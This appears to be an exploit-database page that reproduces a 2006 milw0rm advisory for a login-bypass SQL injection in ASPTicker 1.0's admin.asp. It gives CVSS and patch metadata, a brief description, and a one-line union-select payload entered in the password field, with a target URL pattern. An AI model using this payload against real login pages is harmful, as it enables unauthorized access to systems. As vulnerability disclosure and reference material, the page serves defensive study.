header-logo
Suggest Exploit
vendor:
ASPTicker
by:
ajann
7.5
CVSS
HIGH
SQL Injection
CWE
Product Name: ASPTicker
Affected Version From: ASPTicker 1.0
Affected Version To: ASPTicker 1.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2006

ASPTicker 1.0 (admin.asp) Remote Login ByPass SQL Injection Vulnerability

This vulnerability allows an attacker to bypass the remote login of ASPTicker 1.0 by injecting SQL queries. By exploiting this vulnerability, an attacker can gain unauthorized access to the system.

Mitigation:

Update ASPTicker to a patched version that fixes the SQL injection vulnerability.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  ASPTicker 1.0 (admin.asp) Remote Login ByPass SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.aspapps.com
# $$      :  $ 17.00

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//admin.asp[ByPass]

Example:

//Password} 'union select 0,0,0 from password

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-28]

Navigation

Suggest Exploit

Services By CQR